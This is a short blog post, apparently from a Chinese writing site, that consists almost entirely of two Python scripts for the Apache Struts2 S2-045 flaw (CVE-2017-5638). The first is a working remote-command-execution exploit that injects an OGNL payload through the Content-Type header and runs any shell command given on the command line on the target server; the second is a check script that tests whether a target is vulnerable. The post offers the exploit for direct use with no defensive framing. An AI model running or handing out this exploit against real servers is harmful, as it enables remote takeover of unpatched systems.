美文网首页
struts2 045 poc

struts2 045 poc

作者: zwalts | 来源:发表于2017-06-15 11:32 被阅读0次

    第一篇文章测试用吧

    直接是漏洞利用代码

    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    
    import urllib2
    import httplib
    
    
    def exploit(url, cmd):
        payload = "%{(#_='multipart/form-data')."
        payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        payload += "(#_memberAccess?"
        payload += "(#_memberAccess=#dm):"
        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
        payload += "(#ognlUtil.getExcludedClasses().clear())."
        payload += "(#context.setMemberAccess(#dm))))."
        payload += "(#cmd='%s')." % cmd
        payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        payload += "(#ros.flush())}"
    
        try:
            headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
            request = urllib2.Request(url, headers=headers)
            page = urllib2.urlopen(request).read()
        except httplib.IncompleteRead, e:
            page = e.partial
    
        print(page)
        return page
    
    
    if __name__ == '__main__':
        import sys
        if len(sys.argv) != 3:
            print("[*] struts2_S2-045.py <url> <cmd>")
        else:
            print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
            url = sys.argv[1]
            cmd = sys.argv[2]
            print("[*] cmd: %s\n" % cmd)
            exploit(url, cmd)
    

    还有只是测试的POC

    import requests
    import sys
    
    def poc(url):
    
        payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
    
        headers = {}
        headers["Content-Type"] = payload
        r = requests.get(url, headers=headers)
        if "105059592" in r.content:
            return True
        return False
    
    if __name__ == '__main__':
        if len(sys.argv) == 1:
            print "python s2-045.py target"
            sys.exit()
        elif poc(sys.argv[1]):
            print "vulnerable"
        else:
            print "not vulnerable"
    

    相关文章

      网友评论

          本文标题:struts2 045 poc

          本文链接:https://www.haomeiwen.com/subject/qamyqxtx.html